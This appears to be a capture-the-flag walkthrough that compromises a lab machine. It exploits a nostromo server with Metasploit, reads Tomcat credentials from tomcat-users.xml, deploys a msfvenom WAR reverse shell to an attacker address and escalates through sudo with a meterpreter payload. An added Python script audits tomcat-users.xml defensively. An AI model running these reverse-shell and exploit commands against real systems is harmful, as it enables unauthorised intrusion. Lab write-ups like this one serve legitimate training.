Scanning the target with nmap -A -T4 -p- 192.168.1.7 -vv

There are only a few open ports. I ran dirb against them, but what is interesting is port 2222:

The link http://192.168.1.7:2222/cgi-bin/printenv returned the output of printenv, which gave us information to take advantage of: the target is running a nostromo server, and we have the port and the URI path. (The host is also running a Tomcat server on port 8080, but let us leave that for now.)

Searching for nostromo with searchsploit turns up some exploits:

With the help of Metasploit we can use the module exploit/multi/http/nostromo_code_exec:


We already know the target is running Tomcat on port 8080, so we need to find the user file that holds the Tomcat credentials. It lives in /usr/local/tomcat/conf/; viewing tomcat-users.xml there gives us the information we need:

We can log in with the credentials tomcat:@sprot0230sp
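A defender's check for the weakness exploited above, as an added example that is not part of the original write-up: parse a tomcat-users.xml, flag plaintext passwords and users holding the manager roles that allow WAR deployment, and flag a file mode that lets other local users read it. The audit function, the sample file and the heuristic for spotting digested passwords are my own assumptions.

```python
# Added example, not from the write-up: audit tomcat-users.xml the way a
# defender would, since a readable copy of it handed over manager access above.
import re
import stat
import xml.etree.ElementTree as ET

# Roles that let a user deploy a WAR through the Tomcat manager application.
DEPLOY_ROLES = {"manager-gui", "manager-script", "admin-gui", "admin-script"}
# digest.sh output is salt$iterations$hash; a bare hex digest is the older form.
DIGESTED = re.compile(r"^([0-9a-f]+\$\d+\$)?[0-9a-f]{32,}$", re.IGNORECASE)

def audit_tomcat_users(xml_text, file_mode=None):
    """Return (severity, message) findings for the body of a tomcat-users.xml.

    file_mode is an optional st_mode of the file on disk; it is checked for
    group/world readability, which is what exposed the credentials above.
    """
    findings = []
    if file_mode is not None and file_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(("high", "file readable by group/others; chmod 600 and chown to the tomcat user"))
    root = ET.fromstring(xml_text)
    for el in root.iter():
        # The stock file uses a default namespace, so compare the local tag name only.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username") or el.get("name") or "?"
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        # Heuristic: anything that is not a digest.sh-style value is stored in the clear.
        if password and not DIGESTED.match(password):
            findings.append(("high", f"user {name!r} has a plaintext password"))
        if roles & DEPLOY_ROLES:
            findings.append(("medium", f"user {name!r} can deploy WARs via {sorted(roles & DEPLOY_ROLES)}"))
    return findings

# Constructed sample in the stock tomcat-users.xml layout (credentials made up).
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="changeme" roles="manager-gui,manager-script"/>
  <user username="ops" password="3a2b1c$10000$9f8e7d6c5b4a39281716151413121110" roles="probe"/>
</tomcat-users>"""

if __name__ == "__main__":
    # Pretend the file was left at the default 0644, readable by every local user.
    for sev, msg in audit_tomcat_users(SAMPLE, file_mode=0o100644):
        print(sev.upper(), msg)
```

Run it against the real file with the mode from os.stat to see which of the three findings apply on a given host.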

After logging in we need to create a WAR file and upload it:
msfvenom -p java/shell_reverse_tcp lhost=192.168.1.6 lport=3333 -f war -o shell.war
I used a Metasploit handler, as it is more stable, but you can also catch the shell with nc -lvp 3333

The tomcat user can run sudo:

Once again we create a payload with msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 -f raw -o exploit.jar
and start a new Metasploit handler for it:

Navigate to the root directory and grab the flag:
